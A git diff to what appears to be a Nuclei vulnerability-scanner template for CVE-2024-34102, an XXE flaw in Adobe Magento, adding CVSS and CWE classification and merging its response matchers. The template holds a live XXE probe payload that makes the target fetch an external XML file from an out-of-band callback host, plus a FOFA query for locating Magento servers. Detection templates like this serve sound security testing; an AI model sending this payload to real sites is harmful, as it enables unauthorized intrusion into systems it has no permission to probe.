diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml index 0acc07226e..d2747dc572 100644 --- a/http/cves/2024/CVE-2024-34102.yaml +++ b/http/cves/2024/CVE-2024-34102.yaml @@ -9,10 +9,15 @@ info: reference: - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-34102 + cwe-id: CWE-611 metadata: - fofa-query: app="Adobe-Magento" verified: true max-request: 1 + fofa-query: app="Adobe-Magento" tags: cve,cve2024,adobe,magento,xxe http: @@ -24,19 +29,12 @@ http: {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}} - matchers-condition: or matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(content_type, "application/json")' - - 'contains(body, "message") && contains(body, "log file")' + - 'contains_any(body, "log file", "cartId", "no Route")' + - 'contains(body, "message")' condition: and - - - type: dsl - dsl: - - 'contains(interactsh_protocol, "dns")' - - 'contains(content_type, "application/json")' - - 'contains(body, "message") && contains(body, "cartId")' - condition: and -# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203893e705a9d4cf9e7d7e2496277394f23d202b239760870ea9cadae68ebd9b07022003ab468c5e1c261ffb105d2d9b90ce330b27a1f0546ac68ad46b5b8e29c866ce:922c64590222798bb761d5b6d8e72950